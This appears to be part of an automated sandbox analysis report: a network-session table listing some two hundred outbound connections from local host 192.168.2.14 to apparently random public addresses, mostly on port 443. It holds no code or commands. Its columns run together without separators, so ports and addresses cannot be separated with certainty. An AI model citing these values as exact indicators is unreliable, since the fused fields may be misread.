                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22531192.168.2.144897899.218.209.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22532192.168.2.1447492181.75.143.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22533192.168.2.1440296167.123.2.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22534192.168.2.145426070.184.134.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22535192.168.2.144006031.153.140.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22536192.168.2.1448510111.46.98.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22537192.168.2.143959095.150.188.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22538192.168.2.1458558183.202.239.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22539192.168.2.1438062201.77.203.68443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22540192.168.2.1445980173.227.35.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22541192.168.2.14554062.253.137.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22542192.168.2.1460418184.179.216.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22543192.168.2.1456554114.36.218.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22544192.168.2.1456328134.62.2.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22545192.168.2.1433862110.13.91.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22546192.168.2.144848461.32.151.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22547192.168.2.1459678134.207.146.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22548192.168.2.1433138124.249.125.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22549192.168.2.144177032.48.196.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22550192.168.2.1460786197.64.78.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22551192.168.2.143449219.119.242.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22552192.168.2.145364897.57.246.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22553192.168.2.1457620210.19.237.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22554192.168.2.1439696168.240.0.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22555192.168.2.1439486150.110.151.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22556192.168.2.1447872207.85.43.55443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22557192.168.2.144156269.75.107.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22558192.168.2.143813070.44.251.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22559192.168.2.1452814140.248.75.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22560192.168.2.143879219.130.155.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22561192.168.2.1436516102.122.18.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22562192.168.2.1433638179.41.227.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22563192.168.2.145613884.207.132.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22564192.168.2.1441014170.220.161.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22565192.168.2.143388264.169.146.102443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22566192.168.2.1443352190.114.80.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22567192.168.2.1441234150.57.45.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22568192.168.2.1437562146.209.94.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22569192.168.2.144078637.246.177.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22570192.168.2.1445384151.112.87.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22571192.168.2.1441174169.209.135.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22572192.168.2.145510440.109.68.207443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22573192.168.2.1442608105.200.85.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22574192.168.2.143609899.126.181.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22575192.168.2.1443370220.195.45.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22576192.168.2.1435836164.58.66.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22577192.168.2.144843031.156.5.253443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22578192.168.2.1445636180.41.163.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22579192.168.2.145411467.87.99.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22580192.168.2.1434266133.113.98.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22581192.168.2.143369874.188.64.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22582192.168.2.1452356153.29.165.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22583192.168.2.1451688142.83.240.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22584192.168.2.1442414200.135.219.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22585192.168.2.1443348159.10.242.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22586192.168.2.143891496.36.109.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22587192.168.2.1439680168.44.196.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22588192.168.2.1439668134.241.45.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22589192.168.2.1452656184.18.82.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22590192.168.2.1452786164.12.95.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22591192.168.2.145759817.241.224.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22592192.168.2.1448600175.4.36.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22593192.168.2.146060684.91.244.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22594192.168.2.143604213.22.226.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22595192.168.2.1440222187.147.51.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22596192.168.2.143285245.6.230.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22597192.168.2.1435194118.224.112.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22598192.168.2.1452832197.57.207.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22599192.168.2.1445030179.207.227.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22600192.168.2.143803475.168.224.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22601192.168.2.143731035.18.123.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22602192.168.2.1446258103.79.192.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22603192.168.2.1446608129.19.183.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22604192.168.2.1433032101.168.230.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22605192.168.2.1458908155.102.201.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22606192.168.2.1445396178.137.51.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22607192.168.2.1439310143.54.107.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22608192.168.2.145627097.33.36.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22609192.168.2.1458762130.105.111.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22610192.168.2.144369263.88.39.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22611192.168.2.144188646.235.194.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22612192.168.2.144980287.167.110.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22613192.168.2.1437000102.11.161.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22614192.168.2.146007862.191.222.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22615192.168.2.144977869.182.29.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22616192.168.2.144986440.76.143.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22617192.168.2.1435894125.56.204.1443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22618192.168.2.143570684.199.183.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22619192.168.2.1450348105.170.131.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22620192.168.2.1449418155.165.4.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22621192.168.2.1445398180.114.163.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22622192.168.2.1458048105.184.14.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22623192.168.2.1460814110.166.200.21443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22624192.168.2.1446480104.97.129.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22625192.168.2.1438138180.231.42.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22626192.168.2.1440380159.173.8.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22627192.168.2.145677017.46.34.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22628192.168.2.1459616205.150.81.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22629192.168.2.145816040.70.180.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22630192.168.2.1441492186.193.165.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22631192.168.2.1454568143.12.31.83443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22632192.168.2.145459025.247.104.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22633192.168.2.1448576122.26.86.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22634192.168.2.1433776151.53.146.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22635192.168.2.1447302206.148.117.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22636192.168.2.1449076128.103.241.66443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22637192.168.2.145148483.179.148.252443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22638192.168.2.143847877.48.141.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22639192.168.2.145456261.152.5.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22640192.168.2.1446756180.222.229.49443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22641192.168.2.145381265.201.217.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22642192.168.2.1455026162.28.228.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22643192.168.2.1454206173.32.199.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22644192.168.2.1444298136.91.65.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22645192.168.2.1438202104.16.96.1768080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22646192.168.2.1443048210.209.249.658080
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22647192.168.2.1438568152.22.95.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22648192.168.2.1437452197.64.84.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22649192.168.2.1456256110.170.127.136443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22650192.168.2.145841225.144.10.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22651192.168.2.145692047.66.102.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22652192.168.2.1439190141.247.203.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22653192.168.2.145470865.234.208.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22654192.168.2.144410453.151.146.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22655192.168.2.1458828124.109.94.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22656192.168.2.145355250.7.230.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22657192.168.2.1441484103.18.140.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22658192.168.2.143583031.187.255.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22659192.168.2.1441476111.129.220.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22660192.168.2.144061635.121.56.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22661192.168.2.1452822137.168.92.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22662192.168.2.14434048.41.189.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22663192.168.2.1451494107.136.179.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22664192.168.2.144360874.39.187.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22665192.168.2.143445224.96.36.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22666192.168.2.1442680213.242.87.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22667192.168.2.145902278.31.176.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22668192.168.2.1440410204.202.146.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22669192.168.2.1448774146.128.249.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22670192.168.2.143712680.166.71.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22671192.168.2.145614435.182.91.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22672192.168.2.1450682157.20.247.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22673192.168.2.143322623.36.209.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22674192.168.2.145273873.165.160.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22675192.168.2.143308089.73.21.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22676192.168.2.144589037.218.79.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22677192.168.2.1434990123.200.176.29443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22678192.168.2.144106063.133.125.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22679192.168.2.14600229.172.49.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22680192.168.2.1460634190.67.188.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22681192.168.2.143936676.202.25.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22682192.168.2.1459692107.172.168.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22683192.168.2.143821434.90.36.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22684192.168.2.1458410179.125.32.3443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22685192.168.2.1449634208.255.251.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22686192.168.2.1456106101.169.112.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22687192.168.2.1446606101.240.221.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22688192.168.2.1458212149.149.236.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22689192.168.2.1449252192.60.4.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22690192.168.2.1440254204.79.39.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22691192.168.2.144575886.82.94.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22692192.168.2.1460808180.13.124.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22693192.168.2.1442986217.42.52.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22694192.168.2.1446536137.147.101.201443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22695192.168.2.144310651.216.60.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22696192.168.2.145648862.36.155.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22697192.168.2.1438540129.45.4.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22698192.168.2.143560466.124.225.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22699192.168.2.1442642181.238.251.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22700192.168.2.143811481.202.109.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22701192.168.2.1438350109.73.242.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22702192.168.2.1435810143.10.10.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22703192.168.2.144328036.136.85.37443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22704192.168.2.143685672.229.251.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22705192.168.2.1445420212.103.169.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22706192.168.2.1451614102.59.29.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22707192.168.2.1446728197.221.103.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22708192.168.2.1438604141.215.206.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22709192.168.2.1440928150.168.11.140443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22710192.168.2.145096662.123.3.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22711192.168.2.1444464109.34.175.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22712192.168.2.143594427.82.21.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22713192.168.2.146020061.96.116.154443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22714192.168.2.1440874178.214.232.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22715192.168.2.1460630157.152.101.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22716192.168.2.1437806164.179.213.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22717192.168.2.1444214148.104.66.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22718192.168.2.1451262106.62.91.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22719192.168.2.144371612.151.47.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22720192.168.2.146087278.66.70.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22721192.168.2.143615259.97.78.179443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22722192.168.2.144551018.67.156.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22723192.168.2.143319873.239.161.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22724192.168.2.1444658177.187.48.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22725192.168.2.1443842185.14.28.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22726192.168.2.1454818208.2.102.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22727192.168.2.1440062218.246.50.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22728192.168.2.1439782179.206.64.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22729192.168.2.1458318171.162.205.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22730192.168.2.1435966217.216.26.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22731192.168.2.1448110133.42.41.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22732192.168.2.144833239.236.237.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22733192.168.2.144951214.104.242.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22734192.168.2.1443328174.246.161.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22735192.168.2.144153896.6.200.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22736192.168.2.14367068.236.75.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22737192.168.2.1441422212.105.186.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22738192.168.2.1456196167.76.108.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22739192.168.2.1457492216.246.237.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22740192.168.2.144931659.238.56.76443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22741192.168.2.144735849.10.149.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22742192.168.2.1437534165.216.65.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22743192.168.2.1443736121.140.152.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22744192.168.2.1433748100.174.70.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22745192.168.2.1443456212.26.63.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22746192.168.2.1455754164.71.156.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22747192.168.2.1447718173.35.182.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22748192.168.2.143898478.208.214.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22749192.168.2.1457342213.50.213.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22750192.168.2.1437042160.247.38.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22751192.168.2.1450676163.241.153.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
